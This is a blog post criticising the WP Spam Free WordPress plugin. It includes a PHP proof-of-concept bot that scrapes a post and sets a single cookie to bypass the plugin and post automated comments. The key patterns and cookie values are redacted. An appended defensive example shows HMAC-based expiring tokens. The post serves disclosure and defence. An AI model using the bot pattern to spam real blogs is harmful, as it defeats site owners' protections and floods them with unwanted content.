There’s only one problem: The plugin is way, way, waaay too easy to defeat.
Now, I’m no spammer. But I do know how to program bots. I use them to do routine maintenance on my wiki. When I saw these claims, I thought to myself, “Lots of people are going to download this bot thinking they’re safe from spam, but it won’t last long.”
The first half of that prediction was right: Over 2000 people have downloaded the plugin since it was released a month and a half ago.
I expect the second half of my prediction to be right soon. Here’s why: All that a spammer needs to do to defeat this plugin is add one line of code to their bots. Here comes the technical explanation:
Proof of Concept
When you criticize code, it’s standard to give a proof of concept. Well, here’s mine. I spent a few minutes this morning seeing whether I could post an automated comment to my test blog that was running Scott’s plugin. An experienced spammer would be able to defeat the plugin in only a few minutes.
I program my wiki’s bots in PHP using the Snoopy class to send and receive cookies and form variables. So the code starts with including the snoopy class. Then, I use snoopy to fetch a blog post’s contents. A regular expression finds the comment posting URL, and another finds the post ID that I want to comment on. I define an array of variables that I want to post. Now, if the blog didn’t run WP Spam Free, I’d be done at this point. But to defeat the plugin, all I do is add the one line near the bottom. Take a look:
<?php
// use snoopy
$snoopy = new Snoopy;

// the WP post we want to comment on automatically.
$url = 'http://blog.example.com/2008/01/some-blog-post/';

// scrape the URL
$snoopy->fetch( $url );

// find the URL we need to post to
preg_match( '~ (redacted) ~Usi', $snoopy->results, $matches );
$submitUri = $matches;

// Define an array of vars we want to post. Start with the standard WP post vars:
$post = array();
$post['author'] = 'Proof of Concept';
$post['email']  = 'email@example.com';
$post['url']    = '';
$post['submit'] = 'Add Your Comment';

// Now find the post's ID
preg_match( '~ (redacted) ~i', $snoopy->results, $matches );
$post['comment_post_ID'] = $matches;

// write your comment
$post['comment'] = "This is the comment that I will post automatically.";

// everything up until now is what I would need if I were automatically posting on an unprotected blog.
// So what do I need to do to defeat the SpamFree plugin?

/////////////////
// To defeat the WP Spam-Free plugin, only this ONE LINE is necessary.
$snoopy->cookies[ (redacted) ] = ' (redacted) ';
////////////////

// submit the comment
$snoopy->submit( $submitUri, $post );
?>
Note that only one extra line of code was necessary to defeat the plugin. If they haven’t already, spammers will soon start adding that line as a standard feature of their bots.
Even if Scott made the plugin more difficult to beat (by, for example, having that cookie’s value change instead of being the same all the time), it would require only one regular expression for me to find the JS value and post it using Snoopy. Enjoy it while it lasts, folks, but if this plugin enters widespread usage, expect the spammers to compensate.
What is to be done?
Plugins like Akismet, Spam Karma, and Bad Behavior have proved relatively robust. The easiest defense against spam is to use one or more of them. If you want better defenses, add something unique to your blog. Scott’s technique would work great if his blog were the only one using it. But if thousands of blogs use the same technique, the spammers will adjust their tactics.
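The weakness described above (and in the paragraph about the cookie value never changing) is that one constant value, identical on every install, can be hard-coded into a bot once and replayed forever. The following PHP is an added illustration written for this page, not code from the plugin or from WordPress: it shows the shape of a check in which the value a commenter must present is derived from a per-site secret, bound to the post being commented on, and expires. The secret, the 600-second lifetime, the post IDs and the timestamps are constructed example values, and the function names are hypothetical.

```php
<?php
// Added illustration, not the plugin's code: a per-site, per-post, expiring
// token instead of one constant cookie value shared by every installation.

// Assumed to be generated randomly once per site at install time (constructed here).
const SITE_SECRET = 'replace-with-a-random-per-site-secret';
const TOKEN_TTL   = 600; // seconds a token stays valid after it is issued

// Issue a token for one post. The token carries the post ID and issue time in
// the clear plus an HMAC over both, so neither can be altered without the secret.
function issue_token(int $postId, int $now, string $secret = SITE_SECRET): string {
    $payload = $postId . ':' . $now;
    $mac = hash_hmac('sha256', $payload, $secret);
    return $payload . ':' . $mac;
}

// Verify a token presented with a comment submission for $postId at time $now.
function verify_token(string $token, int $postId, int $now, string $secret = SITE_SECRET): bool {
    $parts = explode(':', $token);
    if (count($parts) !== 3) {
        return false;
    }
    [$tokPost, $tokTime, $tokMac] = $parts;
    if (!preg_match('/^\d+$/', $tokPost) || !preg_match('/^\d+$/', $tokTime)) {
        return false;
    }
    // Bound to the post being commented on: a token scraped from one post
    // does not validate for another.
    if ((int)$tokPost !== $postId) {
        return false;
    }
    // Expired, or issued "in the future" (clock tampering or forgery).
    $age = $now - (int)$tokTime;
    if ($age < 0 || $age > TOKEN_TTL) {
        return false;
    }
    // Constant-time comparison of the expected MAC against the presented one.
    $expected = hash_hmac('sha256', $tokPost . ':' . $tokTime, $secret);
    return hash_equals($expected, $tokMac);
}

// Demonstration with constructed values.
$now   = 1200000000;
$token = issue_token(42, $now);

var_dump(verify_token($token, 42, $now + 30));                       // true: fresh, right post
var_dump(verify_token($token, 43, $now + 30));                       // false: replayed on another post
var_dump(verify_token($token, 42, $now + 3600));                     // false: expired
var_dump(verify_token('one-constant-value', 42, $now));              // false: a hard-coded constant never validates
var_dump(verify_token($token, 42, $now + 30, 'another-site-secret')); // false: token minted for a different site
```

The value the browser presents still has to reach the client somehow (a cookie set by the page, a hidden field, a JavaScript-computed variable), so a bot that fetches the post first and scrapes the current token out of it will still pass, exactly as the paragraph about "one regular expression" points out. What this kind of check removes is the one-line shortcut: the value can no longer be pasted into a bot once and reused against every blog running the plugin, which is the "something unique to your blog" the closing paragraph recommends.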